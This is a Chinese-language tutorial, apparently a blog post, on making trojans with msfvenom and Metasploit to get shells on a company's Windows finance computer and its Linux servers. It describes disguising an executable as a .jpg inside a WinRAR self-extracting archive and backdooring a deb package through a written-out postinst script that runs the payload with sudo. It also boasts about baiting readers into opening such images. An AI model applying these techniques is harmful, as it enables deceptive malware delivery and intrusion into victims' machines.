- 实战-制作 Windows 恶意软件获取公司财务电脑 shell
- 实战- WinRAR 捆绑恶意程序并自动上线 MSF
- 实战-制作 Linux 恶意软件获取公司服务器 shell
- 实战-制作恶意 deb 软件包来触发后门
1.制作 Windows 恶意软件获取 shell
msfvenom 是 msfpayload,msfencode 的结合体,可利用 msfvenom 生成木马程序,并在目标机上执行,在本地监听上线
使用两个编码器
在 MSF 上启动 handler 开始监听后门程序
打开 win7 访问 Kali 搭建的 Web 服务下载执行文件
双击运行 西瓜影音 1.exe 程序
在 MSF 终端查看建立的 session
Shell 中输入 ipconfig 查看 win7 主机的 IP 地址
对目标文件注入payload后门程序
将文件夹制作成压缩包,上传至kali,然后在win7靶机中下载解压运行
回到kali加载攻击模块
准备一张图片
转换后会自动下载
设置自解压选项
设置解压后运行
更新方式
多次解压可能会出现文件已经存在的情况,如果文件存在会询问用户。
建议选择覆盖所有文件或跳过已存在的文件。
覆盖:缺点是如果 exe 程序已经运行那么覆盖会失败。
跳过:如果 exe 文件的参数有修改跳过后则运行的还是旧版本。
建议:每次制作不要用相同的名字。
生成后的自解压文件
最终效果,文件有 ico 图标伪装图片的缩略图,文件名后缀.jpg 来伪装文件类型。
注:exe.不可以去掉
看到这里的你们是否也打开了我发的某张图片呢
我们打开资源管理器可以看到dongman.exe可疑进程,这时我们结束进程
3.实战-制作 Linux 恶意软件获取 shell
使用 msfvenom 生成 linux 可执行文件
参数和生成 Windows 差不多
打开一台centos7虚拟机,下载我们制作好的后门,添加执行权限,执行后门程序
4.实战-制作恶意 deb 软件包来触发后门
制作恶意软件包使用–download-only 方式下载软件包不进行安装
注:freesweep
解压软件包到 free 目录
生成软件包时无论是 payload 的和软件包信息都需要选择能够在目标操作系统上执行的。
创建软件包信息目录
tee /root/free/DEBIAN/postinst #!/bin/bash
sudo chmod 2755 /usr/games/freesweep_sources
sudo /usr/games/freesweep_sources &
EOF
sudo /usr/games/freesweep_sources 是我们要执行的恶意代码
& 是将命令放到后台运行
在kali中执行我们做好的软件包
kali一开 全世界都是我的
文章知识点与官方知识档案匹配,可进一步学习相关知识 络技能树首页概览22080 人正在系统学习中
声明:本站部分文章及图片源自用户投稿,如本站任何资料有侵权请您尽早请联系jinwei@zod.com.cn进行处理,非常感谢!